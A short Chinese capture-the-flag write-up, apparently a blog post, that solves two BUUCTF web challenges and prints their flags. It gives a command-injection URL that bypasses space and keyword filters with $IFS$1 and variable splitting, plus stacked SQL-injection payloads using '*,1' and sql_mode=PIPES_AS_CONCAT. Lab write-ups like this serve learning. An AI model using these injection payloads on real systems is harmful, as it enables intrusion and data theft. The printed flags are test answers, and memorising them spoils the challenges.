[GXYCTF2019]Ping Ping Ping 1和[SUCTF 2019]EasySQL 1新手解题过程

1、[GXYCTF2019]Ping Ping Ping 1

我们直接查看flag.php,提示我们/?ip= fxck your space!,无法直接查看flag.php,需要绕过空格。

[http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php](http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php "http://57c6df34-c9c9-45c5-8f85-a4ef66c1211d.node5.buuoj.cn:81/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php")

<!--?php

$flag = "flag{0b46a562-1574-4bfe-87ae-356928a78954}";

?-->

2、[SUCTF 2019]EasySQL 1

随便输入一个数字回显Array ( [0] => 1 ),输入其他内容回显Nonono。

猜测该系统后台代码为:select $_POST['query'] || flag from flag [1] ,且那么直接在1前面拼接*,即*,1,解得flag:

flag{4151e8ed-491a-4c8b-bc72-c076522a4936}

1;show tables; 发现Flag表

构造payload为:1;set sql_mode=PIPES_AS_CONCAT;select 1 ,相当于是将select 1 和 select flag from Flag 的结果拼接在一起,也就是 select 1;的结果拼接select flag from Flag的结果。

相关推荐
志栋智能14 小时前
超自动化安全:构建智能安全运营的核心引擎
大数据·运维·服务器·数据库·安全·自动化·产品运营
星幻元宇VR15 小时前
VR航空航天科普设备【VR时空直升机】
科技·学习·安全·生活·vr
合天网安实验室15 小时前
记录一个免杀的php webshell demo
渗透测试·php·webshell·免杀
AnalogElectronic16 小时前
linux 测试网络和端口是否连通的命令详解
linux·网络·php
weixin_5142531816 小时前
428-uitars tmux
安全·web安全
跨境数据猎手17 小时前
跨境独立站系统技术拆解(附带源码)
服务器·前端·php
漠月瑾-西安18 小时前
软件忘了“擦黑板”:一次内核信息泄露事件(CVE-2024-49997)的深度剖析
网络安全·linux内核·内核安全·信息泄露·内存安全·cve漏洞分析
淘矿人18 小时前
从0到1:用Claude启动你的第一个项目
开发语言·人工智能·git·python·github·php·pygame
Irene199120 小时前
大数据开发语境下,SQL 模式名,映射关系 - - 概念理解
大数据·数据库·sql
KKKlucifer20 小时前
日志审计与行为分析在安全服务中的应用实践
网络·人工智能·安全